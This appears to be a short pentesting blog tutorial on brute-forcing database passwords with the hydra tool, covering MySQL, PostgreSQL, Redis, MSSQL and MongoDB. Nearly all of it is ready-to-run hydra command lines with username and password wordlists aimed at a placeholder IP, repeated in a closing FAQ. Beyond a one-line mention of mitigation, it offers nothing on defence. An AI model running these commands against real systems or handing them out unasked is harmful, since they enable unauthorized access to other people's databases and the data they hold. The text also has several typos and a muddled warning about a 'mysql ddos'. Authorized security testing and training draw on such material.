How to Brute Force Database Services

How to Brute to Force Database Services

Today in this tutorial we will learn how to brute force Database services passwords, when testing on live environments be cautious or you will trigger a mysql ddos into the service.

Attack and Penetration Testing of Database Services

Brute force databases services can be one of the most simple attacks to do but can have a huge impact on the business. Mitigate this kind of attacks is crucial to any security team when installing a mysql server always keep in mind the best security practices

Mysql Paswords

Mysql password can have different hash types, hydra can detect them automatically, mysql service run on port 3306/TCP.

MySQL Old Hash

Lenght: 8 bytes

Hash Example: 706317496665abbb

MySql New Hash

Lenght: 20 bytes

Hash Example: *E6CC90B878B948C3510F5433C792C46C58C4AF40

hydra -L usernames.txt -P pass.txt <IP> mysql

Hydra Parameters

  • -L -> List of usernames to test
  • -P -> Wordlist of passwords to test
  • mysql -> define the service type into hydra

PostgresSQL Passwords

Port: 5432/TCP

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres

Redis Passwords

hydra –P /path/pass.txt redis://<IP>:<PORT> 

MSSQL Passwords

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
  1. How to Brute Force MySQL Passwords?

    hydra -L usernames.txt -P pass.txt <IP> mysql

  2. How to Brute Force MSSQL Passwords?

    hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql

  3. How to Brute Force Redis Passwords?

    hydra –P /path/pass.txt redis://<IP>:<PORT>

  4. How to Brute Force Postgres Passwords?

    hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres

  5. How to Brute Force MongoDB Passwords?

    hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mongodb